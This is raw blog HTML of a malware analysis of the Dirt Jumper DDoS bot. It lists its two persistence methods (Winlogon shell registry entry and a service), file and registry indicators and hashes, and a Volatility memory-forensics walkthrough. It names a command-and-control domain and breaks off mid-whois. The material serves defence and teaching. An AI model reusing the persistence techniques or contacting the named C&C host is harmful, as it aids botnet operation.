href="http://www.shadowserver.org/wiki/pmwiki.php/Calendar/20110123">Darkness/Optima bot we described earlier this year</a> and is gaining more buyers in underground market due to easy implementation and powerful attack methods.</span></div><hr /><div></div><div><span style="font-size: small;"> </span><br />
<b><span class="Apple-style-span" style="font-size: large;"><u>Table of Contents</u></span></b><br />
<a href="http://www.blogger.com/post-edit.g?blogID=74827929652568895&postID=1164562385700566261" name="top"> </a><br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; text-align: right;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWhJz90hb9pYGbHBI3_H0XPTd7_qS0vrAq9xbakEbSMUQj0LhjaLi-LvnBySkkP1zfy0gQdx8NhIKp4-I0fu7aJxWBES_VxRjHlh3339AjVzDy65W-d4epE_aJbRt_Q0xnrNwdhSD04QoZ/s1600/944djs.jpg" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="168" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWhJz90hb9pYGbHBI3_H0XPTd7_qS0vrAq9xbakEbSMUQj0LhjaLi-LvnBySkkP1zfy0gQdx8NhIKp4-I0fu7aJxWBES_VxRjHlh3339AjVzDy65W-d4epE_aJbRt_Q0xnrNwdhSD04QoZ/s320/944djs.jpg" width="320" /></a></td></tr>
<tr align="right"><td class="tr-caption">September version control panel. Shopworld.biz</td></tr>
</tbody></table><ol><li>Binary analysis<span style="font-size: small;"><span style="font-size: small;"><br />
MD5 F29B1089B3F5E076D4D4BD2A3A02D3CB </span></span></li>
<li>Memory analysis using Volatity 2.0<span style="font-size: small;"><span style="font-size: small;">MD5 F29B1089B3F5E076D4D4BD2A3A02D3CB</span></span></li>
<li>Command & Control servers<span style="font-size: small;"><span style="font-size: small;"><br />
MD5 F29B1089B3F5E076D4D4BD2A3A02D3CB</span></span></li>
<li>Dirt Jumper current versions and general information</li>
<li>Review of other samples, command and control servers and DDoS actor groups</li>
</ol></div><div><br />
<hr /><div><a href="http://www.blogger.com/post-edit.g?blogID=74827929652568895&postID=1164562385700566261" name="top"><span style="font-size: small;"><span style="font-size: large;"><b>1. Binary analysis and comparison</b></span></span></a><br />
<span style="font-size: small;"><span style="font-size: large;"><b>MD5 F29B1089B3F5E076D4D4BD2A3A02D3CB </b></span><b></b></span><br />
<a href="http://www.blogger.com/post-edit.g?blogID=74827929652568895&postID=1164562385700566261" name="top"><span style="font-size: small;"><b><br />
</b></span></a></div><br />
<div><span style="font-size: small;">There are two ways that Dirt Jumper gets installed on a system - one, as a service, and two, by adding the malicious binary name to the "shell=" line in the registry under HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\current version\Winlogon. Installation as a service is more common and this is the default method for versions 1-3 and v. September 2011. There are some private and custom versions of Dirt Jumper using the Explorer shell method.</span><br />
<br />
<div><a href="http://www.blogger.com/post-edit.g?blogID=74827929652568895&postID=1164562385700566261" name="top"></a><br />
<div style="text-align: center;"><div style="text-align: -webkit-auto;"><a href="http://www.blogger.com/post-edit.g?blogID=74827929652568895&postID=1164562385700566261" name="top"><span style="font-size: small;"> </span></a></div><span style="font-size: small;"><b>INSTALLATION TYPE 1 - </b></span><br />
<span style="font-size: small;"><b>REGISTRY - WINLOGON -"SHELL=" MODIFICATION</b></span></div><a href="http://www.blogger.com/post-edit.g?blogID=74827929652568895&postID=1164562385700566261" name="top"><br />
<span style="font-size: small;"></span></a><a href="http://asert.arbornetworks.com/2011/08/dirt-jumper-caught/" rel="bookmark" title="Permanent Link: Dirt Jumper Caught in the Act"> As seen in <i>Dirt Jumper Caught in the Act - Arbor Networks</i></a></div><div><span style="font-size: small;">Size: 204800</span><br />
<span style="font-size: small;">MD5: F7C0314FB0FBD52AF9D4D721B2C897A2 </span><br />
<br />
<div style="text-align: center;"></div></div><div><div style="text-align: left;"><blockquote><blockquote><blockquote style="color: black;"><blockquote><blockquote style="background-color: #cccccc;"><div style="background-color: #d0e0e3;"><span style="font-size: small;"><b>Company Name</b> Comma Stone</span></div><div style="background-color: #d0e0e3;"><span style="font-size: small;"><b>File Description </b>Signs Blast Egypt Avery</span></div><div style="background-color: #d0e0e3;"><span style="font-size: small;"><b>File Version</b> <b>InternalName</b> Wolff Diets Cowboy Mig</span></div><div style="background-color: #d0e0e3;"><span style="font-size: small;"><b>Legal Copyright </b>Copyright Sobs Sift 1997-2011</span></div><div style="background-color: #d0e0e3;"><span style="font-size: small;"><b>Original Filename</b> Baby.exe</span></div><div style="background-color: #d0e0e3;"><span style="font-size: small;"><b>Product Name</b> Picks Air</span></div><div style="background-color: #d0e0e3;"><span style="font-size: small;"><b>Product Version </b>VarFileInfo</span></div></blockquote></blockquote></blockquote></blockquote></blockquote><div style="text-align: center;"><span style="font-size: small;"><span style="font-size: x-small;">File properties</span></span></div></div><div align="left"><span style="font-size: small;"><br />
</span><br />
<span style="font-size: small;">The following system changes may indicated the presence of this bot</span></div><ul style="margin-bottom: 0px; margin-top: 0px;" type="disc"><li><span style="font-size: small;"> <div align="left">The presence of the following files:<br />
<ul><li><i><system folder>\</i><b>svdhalp.exe</b></li>
<li><i><system folder>\</i><b>svdhalp.exe</b><b>.ini</b></li>
<li><i><Windir>\</i><b>syskey2i.drv </b> - contains nothing but a 15 digit bot id number</li>
</ul>In subkey: <i>HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon</i> </div><div align="left">Sets value: "<i>Shell</i>" With data:<b> "<i>explorer.exe,</i> <i>svdhalp.exe </i></b><br />
<b><i><br />
</i></b><br />
<b><i><br />
</i></b></div></span></li>
</ul></div></div></div><div style="text-align: center;"><span style="font-size: small;"><b>INSTALLATION TYPE 2 - </b></span><br />
<span style="font-size: small;"><b>AS A SERVICE </b></span></div><span style="font-size: small;">Size: 276480 </span><span style="font-size: small;"> </span><br />
<span style="font-size: small;">MD5 F29B1089B3F5E076D4D4BD2A3A02D3CB</span><br />
<div class="detailSectionPadding contentText"><div><div align="left"><div style="text-align: center;"><br />
<blockquote><blockquote><blockquote><blockquote><blockquote style="background-color: #cccccc;"><div style="background-color: #d0e0e3; text-align: left;"><span style="font-size: small;"><span style="color: black;"><b>CompanyName </b>Ohokls Vwivanl</span></span></div><div style="background-color: #d0e0e3; text-align: left;"><span style="font-size: small;"><span style="color: black;"><b>File Description</b> Ohokls Uanvbnmsel Qukxwdrb</span></span></div><div style="background-color: #d0e0e3; text-align: left;"><span style="font-size: small;"><span style="color: black;"><b>File Version </b>25, 34, 66, 19 <b>InternalName</b> Ohokls</span></span></div><div style="background-color: #d0e0e3; text-align: left;"><span style="font-size: small;"><span style="color: black;"><b>Legal Copyrigh</b>t Copyright Ohokls Vwivanl 1997-2011</span></span></div><div style="background-color: #d0e0e3; text-align: left;"><span style="font-size: small;"><span style="color: black;"><b>Original Filename </b>Ohokls.exe <b>Product Name </b>Ohokls Uanvbnmsel<span style="color: black;"> Qukxwdrb<b> VarFileInfo</b></span></span></span></div></blockquote></blockquote></blockquote></blockquote></blockquote></div></div></div></div></div><div style="text-align: center;"><span style="font-size: x-small;">File properties</span></div><div style="font-family: Verdana,sans-serif;"><div style="text-align: center;"></div><br />
The following system changes may indicated the presence of this bot</div><ul style="font-family: Verdana,sans-serif; margin-bottom: 0px; margin-top: 0px;" type="disc"><span style="font-size: small;">
<li> <div align="left">The presence of the following files:<br />
<ul><li><i><system folder>\drivers\<b>svgtook.exe</b> File name varies, often starting with sv (e.g.svflooje.exe,svcgoow.exe)</i></li>
<li><i><Windir>\<b>keys.ini </b></i>- contains nothing but a 15 digit bot id number</li>
</ul></div><div align="left"><i> </i></div></li>
<li> <div align="left">The presence of the registry modifications such as the following examples (name of the file may vary)</div><div align="left">HKLM\SYSTEM\CurrentControlSet\Services\<b><i>svgtook</i></b> HKLM\SYSTEM\CurrentControlSet\Services\<b><i>svgtook\Security</i></b> HKLM\SYSTEM\CurrentControlSet\Services\<b><i>svgtook\Enum</i></b> The traffic pattern:</div></li>
</span></ul><div style="font-family: Verdana,sans-serif;"><span style="font-size: small;"><b><i> </i></b><b><i></i></b></span><br />
<br />
<br />
<table border="0" cellpadding="0" cellspacing="0" style="text-align: left; width: 100%;"><tbody>
<tr> <td style="text-align: left;"><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTMEdgtgmi3FBcWFKN_pHkNz_Mc7mpkz8t3WFldzI-21GKEnnb2Tgm5UQ7bHT4YRn4lNS4ee4YImkloXwvNN_Y9rKbWCwYQln36h8pBBVO8QbmuN07nhpsLtBeHoCFm9qNOxHze9tGjgY0/s1600/stream2.JPG" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTMEdgtgmi3FBcWFKN_pHkNz_Mc7mpkz8t3WFldzI-21GKEnnb2Tgm5UQ7bHT4YRn4lNS4ee4YImkloXwvNN_Y9rKbWCwYQln36h8pBBVO8QbmuN07nhpsLtBeHoCFm9qNOxHze9tGjgY0/s320/stream2.JPG" width="312" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Traffic components</td></tr>
</tbody></table></td> <td><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzFy3QZYnI-RxCVVM17fGXhNk68sifs3uPRokdFHzkUkCd1WcBb2Y6zqWoImGVx68fdWmkE1DUxB7WHvolFU3T_nkCRXRMzojoXPk2HiSj7BM_mY-SAHeVIw4D0fZFoDEZBuvUvdPaSjx7/s1600/stream_content.jpg" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="350" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzFy3QZYnI-RxCVVM17fGXhNk68sifs3uPRokdFHzkUkCd1WcBb2Y6zqWoImGVx68fdWmkE1DUxB7WHvolFU3T_nkCRXRMzojoXPk2HiSj7BM_mY-SAHeVIw4D0fZFoDEZBuvUvdPaSjx7/s400/stream_content.jpg" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Stream Content</td></tr>
</tbody></table></td> </tr>
</tbody> </table><span style="font-size: small;"> </span> </div><div style="font-family: Verdana,sans-serif; text-align: center;"><span style="font-size: small;">As can be seen below, the two binaries show slight modifications of the same bot.</span><br />
<br />
<span style="font-size: small;"> </span></div><div style="font-family: Verdana,sans-serif;"><span style="font-size: small;"> </span> </div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="font-family: Verdana,sans-serif; margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAXfzL_K-1irkbprbIiFXAn_yFf7x-3nyJipOTWp6Z_Ap53l0WiO24kE1FPugjiCscU6cstjdUP3VNteka-vZXAQxOk3y0i6e2dk-vZW5W545K21B0O3CAPEWEh8M2XUkE3Rlv_JWu6Xf6/s1600/Comparisonof2.png" style="margin-left: auto; margin-right: auto;"><img border="0" height="568" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAXfzL_K-1irkbprbIiFXAn_yFf7x-3nyJipOTWp6Z_Ap53l0WiO24kE1FPugjiCscU6cstjdUP3VNteka-vZXAQxOk3y0i6e2dk-vZW5W545K21B0O3CAPEWEh8M2XUkE3Rlv_JWu6Xf6/s640/Comparisonof2.png" width="640" /></a></span></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><b><span style="font-size: small;">Comparison of two Dirt Jumper binaries</span></b><br />
<b><span style="font-size: small;"></span></b></td></tr>
</tbody></table><div style="font-family: Verdana,sans-serif;"><span style="font-size: small;">The current IDS signatures for Dirt Jumper can be modified to match this additional version - The bot ID seems to be the current most common denominator, while C&C URLs and bot commands somewhat vary.</span><br />
<span style="font-size: small;"> </span> <span style="font-size: small;"> </span> </div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="font-family: Verdana,sans-serif; margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlL9palfAJqH5jkcLIZKReps-Kkh4BtyRQ9o6fQUE3fhcsAaof2CvTD6NldyIgKYMR6HJLcCfFYK6Sr2eq5cYs31s8uv6P1Ap3NT9ZjNRCz9TeCKgPvI_8zKw5_2D1qPTteUJ8o9D8bs9z/s1600/signature.png" style="margin-left: auto; margin-right: auto;"><img border="0" height="266" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlL9palfAJqH5jkcLIZKReps-Kkh4BtyRQ9o6fQUE3fhcsAaof2CvTD6NldyIgKYMR6HJLcCfFYK6Sr2eq5cYs31s8uv6P1Ap3NT9ZjNRCz9TeCKgPvI_8zKw5_2D1qPTteUJ8o9D8bs9z/s640/signature.png" width="640" /></a></span></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;">Emerging threats signature as proposed by Kevin Ross</span></td></tr>
</tbody></table><div style="font-family: Verdana,sans-serif;"><span style="font-size: small;"><b> </b></span></div><div style="font-family: Verdana,sans-serif;"><span style="font-size: small;"><b> </b></span></div><div style="font-family: Verdana,sans-serif;"><span style="font-size: small;"><b> </b></span></div><div style="font-family: Verdana,sans-serif;"><hr /><span style="font-size: small;"> </span> <span style="font-size: small;"><b> </b></span><br />
<span style="font-size: large;"><b>2. Memory Analysis using Volatility 2.0 </b></span><br />
<span style="font-size: large;"><b> MD5 F29B1089B3F5E076D4D4BD2A3A02D3CB</b></span><br />
<br />
</div><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">I've now routinely adopted the use of Volatility as a key tool in any malware analysis that I do. Volatility is described as "a completely open collection of tools.....for the extraction of digital artifacts from volatile memory (RAM) samples". Volatility's ease of use, especially in obtaining basic forensic information that may shed a quick light on the analyzed specimen, makes it an indispensible tool. Version 2.1Alpha was recently released, so I used this to analyze Dirt Jumper binary </span><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">f29b1089b3f5e076d4d4bd2a3a02d3cb.</span></span><br />
<span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><br />
I executed the malware in my sandbox lab under VMWare Version 7. One of the things I like about VMWare is that you can easily obtain a memory snapshot by suspending the virtual machine, and copying the .vmem file to your analysis directory. That .vmem file is an exact representation of the virtual machine's memory image. If you are not using VMWare, you can also easily snap memory via the <a href="http://www.moonsols.com/windows-memory-toolkit/">MoonSols Windows Memory Toolkit.</a></span></span><br />
<br />
<span class="Apple-style-span" style="font-family: Verdana,sans-serif;">The first step in any analysis using Volatility is to get information about the image. This is done via the '<a href="http://code.google.com/p/volatility/wiki/CommandReference#imageinfo">imageinfo</a>' command as seen below.</span><br />
<span class="Apple-style-span" style="font-family: Verdana,sans-serif;"> </span><br />
<br />
<div face="Verdana,sans-serif"></div><div face="Verdana,sans-serif"></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" face="Verdana,sans-serif" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHg-GMaT22Pbohcxh2SwcT66Ou3ileddUocSyeduF-69ijm6U6sqTwgBWaSx7utT97m5zn1L-L2ggAcnkqN74vaPKj9WXacxklFUirkHIft9ZpmxVGTux51qnoy9ZP8WDpnXOOsr5mdvQ/s1600/imageinfo.jpg" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHg-GMaT22Pbohcxh2SwcT66Ou3ileddUocSyeduF-69ijm6U6sqTwgBWaSx7utT97m5zn1L-L2ggAcnkqN74vaPKj9WXacxklFUirkHIft9ZpmxVGTux51qnoy9ZP8WDpnXOOsr5mdvQ/s1600/imageinfo.jpg" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Volatility 'imageinfo' command</td></tr>
</tbody></table><div face="Verdana,sans-serif"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">Notice that the suggested profile is "<b>WinXPSP3x86</b>". We will specify this profile for all subsequent Volatility usage by using the '--profile=' option when invoking Volatility..</span><br />
</div><div face="Verdana,sans-serif"><span style="font-family: Verdana,sans-serif;"> </span></div><div face="Verdana,sans-serif"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">Now we wish to list all the active processes. This is done with the "<a href="http://code.google.com/p/volatility/wiki/CommandReference#pslist">pslist</a>" command. Note the use of the "-P" switch to tell Volatility to display the physical memory offset rather than the virtual offset.</span><br />
<span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><br />
</span><br />
<br />
<div face="Verdana,sans-serif"><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkdBJ0sj0xASdgBUbnjLqjGadfP1o_nwAqSnxtxte3uluebZQeZ3kov-dbfObSecAMMwL7Ub4cg1Ot8OXkqdnZJccgtXbNfpUmlJU_VPp3lUlzxk_mm0EXjZTfvcILVP-1lMgZy1aX_Gc/s1600/pslist.jpg" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkdBJ0sj0xASdgBUbnjLqjGadfP1o_nwAqSnxtxte3uluebZQeZ3kov-dbfObSecAMMwL7Ub4cg1Ot8OXkqdnZJccgtXbNfpUmlJU_VPp3lUlzxk_mm0EXjZTfvcILVP-1lMgZy1aX_Gc/s1600/pslist.jpg" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Volatility 'pslist' command</td></tr>
</tbody></table></div><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">The timestamp indicates the date/time that the process started. Note that all the processes except for 'svgtook.exe' started within a few seconds of 00:12. 'svgtook.exe' has a Process ID (PID) of 1900 and began at 10/05/2011 at 00:14. It should also be noted that in this sandbox run, I initiated the malware execution immediately after booting. Note also that there is no browser process or anything else that should initiate an Internet connection.</span><br />
<span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><br />
I next run the Volatility 'connections' command to see all the active network connections. Note that the large number of remote address connections are all associated with PID 1900.</span><br />
<br />
<span class="Apple-style-span" style="font-family: Verdana,sans-serif;"> </span><br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirLD7C4oBJCCrc9n-unpARM3BrpXaPnvCSuB_F-1n11nsFcLaOREcXn3qSU3Lgvzb44EdABV_QASAVTx7ZUzlzkcz7tjvXtIInRYQBslEagp9FGpNnCNenAB6nIaEa_RfELwZyKoPnhddl/s1600/connections.jpg" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirLD7C4oBJCCrc9n-unpARM3BrpXaPnvCSuB_F-1n11nsFcLaOREcXn3qSU3Lgvzb44EdABV_QASAVTx7ZUzlzkcz7tjvXtIInRYQBslEagp9FGpNnCNenAB6nIaEa_RfELwZyKoPnhddl/s1600/connections.jpg" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Volatility 'connections' command</td></tr>
</tbody></table><div face="Verdana,sans-serif"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">The Volatility '<a href="http://code.google.com/p/volatility/wiki/CommandReference#sockets">sockets</a>' command will display the listening sockets for any protocol. In the figure below, we see many open sockets for both the UDP and TCP protocol. With one exception, all of these processes are again associated with Process ID 1900, '<b>svgtook.exe</b>'. By virtue of its many open sockets and dozens of outbound connections, Process ID 1900 certainly seems worth a closer look.</span><br />
<span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><br />
</span></div><div face="Verdana,sans-serif"><span class="Apple-style-span"> </span></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="font-family: Verdana,sans-serif; margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNAhaPUvP2WMP6JnUXyN8-w_Dubxfm4KQmOWG6gz-GCJVwuDc1WUuqNHjkUvwR2PXChFw86PA24TYqGKaUCoU53ll3bp8mzIkEZFpo5MpAC9olRLlBfhD9GxBdyf2yIYYtzHF4ma1-vvID/s1600/sockets.jpg" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNAhaPUvP2WMP6JnUXyN8-w_Dubxfm4KQmOWG6gz-GCJVwuDc1WUuqNHjkUvwR2PXChFw86PA24TYqGKaUCoU53ll3bp8mzIkEZFpo5MpAC9olRLlBfhD9GxBdyf2yIYYtzHF4ma1-vvID/s1600/sockets.jpg" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Volatility 'sockets' command</td></tr>
</tbody></table><div face="Verdana,sans-serif"><span class="Apple-style-span"> </span></div><div face="Verdana,sans-serif"></div><div face="Verdana,sans-serif" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span">By the way, a great new feature of Volatility 2.0 is the '<a href="http://code.google.com/p/volatility/wiki/CommandReference#netscan">netscan</a>' plugin. This plugin will scan for network connection artifacts in Windows Vista, Windows 2008 Server and Windows 7 memory artifacts. From the <a href="http://code.google.com/p/volatility/wiki/CommandReference#netscan">Volatility wiki</a>, <i>"To scan for network artifacts in Windows Vista, Windows 2008 Server and Windows 7 memory dumps, use the netscan command. This finds TCP endpoints, TCP listeners, UDP endpoints, and UDP listeners. It distinguishes between IPv4 and IPv6, prints the local and remote IP (if applicable), the local and remote port (if applicable), the time when the socket was bound or when the connection was established, and the current state (for TCP connections only)."</i></span></div><div style="font-family: Verdana,sans-serif;"><span class="Apple-style-span"> </span></div><div face="Verdana,sans-serif"><div style="font-family: Verdana,sans-serif;"><span class="Apple-style-span">Since I ran this analysis on a Windows XP system, I'm not able to show you a 'netscan' output for this particular instance. In a follow-up analysis, I'll utilize Volatility under Windows 7.</span><br />
<br />
<span class="Apple-style-span"> </span></div><div style="font-family: Verdana,sans-serif;"></div><div style="font-family: Verdana,sans-serif;">To look more closely at Process 1900, we can dump the process from physical memory. This allows us to examine the process in its executing context as opposed to a packed and possibly obfuscated state. One typical analysis step is to dump the process and use the 'strings' command to look for items of interest. Let's see the result of performing this against our Process 1900. Using the Volatility command '<a href="http://code.google.com/p/volatility/wiki/CommandReference#procmemdump">procmemdump</a>', the <b>'svgtook.exe'</b> process (PID 1900) is dumped to the specified directory. The following image shows this command being run, followed by running strings against the dumped file, and using 'grep' to search for the string "http".<br />
<br />
</div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEge3NbdkZsO6CrIOzXO276oXW85iwLxhaDu8VfaONs8oo_kdf-Ki-vxnWSCeTNh3-R4cavtowJvbBFk9MrGPuXo2h-oq5uGsKOd09qg-S82DBtt5TmQ4b0XiewuNugqIus6keClLZcB97J1/s1600/proc_dump.jpg" style="margin-left: auto; margin-right: auto;"><img border="0" height="410" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEge3NbdkZsO6CrIOzXO276oXW85iwLxhaDu8VfaONs8oo_kdf-Ki-vxnWSCeTNh3-R4cavtowJvbBFk9MrGPuXo2h-oq5uGsKOd09qg-S82DBtt5TmQ4b0XiewuNugqIus6keClLZcB97J1/s640/proc_dump.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Volatility 'procdump' command</td></tr>
</tbody></table><div style="font-family: Verdana,sans-serif;">The results show various strings containing "http" being discovered in the dumped file. These include various legitimate sites, as well as the string 'httpsend_s".<br />
<br />
</div><div style="font-family: Verdana,sans-serif;"></div><div style="font-family: Verdana,sans-serif;">One of the best ways to discover evidence pertaining to a suspicious process is to dump the Virtual Address Descriptor (VAD) and examine the dumped sections with the 'strings' command. By examining the dumped VAD segments, you can get an excellent view of the "live" data associated with the examined process. A good reference for this can be found in the whitepaper, "<a href="http://www.dfrws.org/2007/proceedings/p62-dolan-gavitt.pdf">The VAD tree: A process-eye view of physical memory</a>" by Brendan Dolan-Gavitt. From the whitepaper," <i>The Virtual Address Descriptor tree is used by the Windows memory manager to describe memory ranges used by a process as they are allocated. When a process allocates memory with VirutalAlloc, the memory manager creates an entry in the VAD tree.</i>" Since I'm particularly interested in any URLs or network connection remnants associated with Process 1900, I'll use the '<a href="http://code.google.com/p/volatility/wiki/CommandReference#vaddump">vaddump</a>' command to dump the VAD memory segments associated with this process.<br />
<br />
</div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRxkPKRn_2fo3XZqvEVaa8iFqjQu7zI1tWMS9KyrakpieVan08n2Ye7uVeNrjBQcC63Wrp3nJNcVI7qhxfeB5oAPuOnPH_Bf_HyFbiuwIBnIJI8VUHqGuZDdXkRPKSa7J6ZgF8vHDYZsN-/s1600/vad_dump.jpg" style="margin-left: auto; margin-right: auto;"><img border="0" height="76" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRxkPKRn_2fo3XZqvEVaa8iFqjQu7zI1tWMS9KyrakpieVan08n2Ye7uVeNrjBQcC63Wrp3nJNcVI7qhxfeB5oAPuOnPH_Bf_HyFbiuwIBnIJI8VUHqGuZDdXkRPKSa7J6ZgF8vHDYZsN-/s640/vad_dump.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Volatility 'vaddump' command</td></tr>
</tbody></table><div style="font-family: Verdana,sans-serif;">The result of this command leaves approx 950 files in the dump directory of the VAD segments associated with PID 1900. Running 'strings' and grepping for 'http' yields two segments of interest.<br />
<br />
</div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgF9DP-ydIH8joJ4nNadX-Q0CIt38kdPuYLh2pQPoP9gQ1NUsVt6s2gJCZUzj-yjk1mopY11agg6No9UnpR3AvgMDJ7ooHNsD9a1JajVoTN0RhdqC1hXdxP_pPNTUBHOHeMO-AT3nk4dGV5/s1600/vad_strings.jpg" style="margin-left: auto; margin-right: auto;"><img border="0" height="394" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgF9DP-ydIH8joJ4nNadX-Q0CIt38kdPuYLh2pQPoP9gQ1NUsVt6s2gJCZUzj-yjk1mopY11agg6No9UnpR3AvgMDJ7ooHNsD9a1JajVoTN0RhdqC1hXdxP_pPNTUBHOHeMO-AT3nk4dGV5/s640/vad_strings.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Examining VAD segments for the string "http"</td></tr>
</tbody></table><div><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">In the image above, we see VAD segment '<b>svgtook.exe.23ce450.00400000-00dadfff.dmp</b>' reference the same web sites as seen in the dumped process, while '<b>svgtook.exe.23ce450.01420000-0151ffff.dmp</b>' shows references to various DDoS target URLs received, as well as the C&C "http://asdaddddaaaa.com"</span><br />
<div><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><br />
</span></div></div><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">So in this brief analysis, we have been able to utilize Volatility to quickly extract key information about the running Dirt Jumper process. This also equips us to further investigate this process, as well as how other Windows processes may be affected. For example, Volatility allows for extensive registry carving and analysis as well as the use of plugins specifically designed for <a href="http://code.google.com/p/volatility/wiki/CommandReference#Malware_and_Rootkits">analyzing malicious code</a>.</span></div><div style="font-family: Verdana,sans-serif;"><br />
<hr /><span style="font-size: large;"><b>3. Command & Control servers </b></span><br />
<span style="font-size: large;"><b>MD5 F29B1089B3F5E076D4D4BD2A3A02D3CB </b></span><span style="font-size: large;"><b></b></span><br />
<span style="font-size: large;"><b><br />
</b></span></div><div style="font-family: Verdana,sans-serif;"><span style="font-size: small;"> </span></div><div><div><div style="font-family: Verdana, sans-serif;"><span style="font-size: small;">Upon execution, Dirt Jumper sample f29b1089b3f5e076d4d4bd2a3a02d3cb attempted DNS resolution for the domain, asdaddddaaaa.com.</span></div><div style="font-family: Verdana, sans-serif;">The domain registration information for asdaddddaaaa.com is: </div><blockquote style="font-family: Verdana,sans-serif;"><div><span class="Apple-style-span" style="font-size: small;">Domain Name: ASDADDDDAAAA.COM</span></div><div><span class="Apple-style-span" style="font-size: small;">Registrar: BIZCN.COM, INC.</span></div><div><span class="Apple-style-span" style="font-size: small;">Whois Server: whois.bizcn.com</span></div><div><span class="Apple-style-span" style="font-size: small;">Referral URL: http://www.bizcn.com</span></div><div><span class="Apple-style-span" style="font-size: small;">Name Server: NS1.FREEDNS.WS</span></div><div><span class="Apple-style-span" style="font-size: small;">Name Server: NS2.FREEDNS.WS</span></div><div><span class="Apple-style-span" style="font-size: small;">Status: 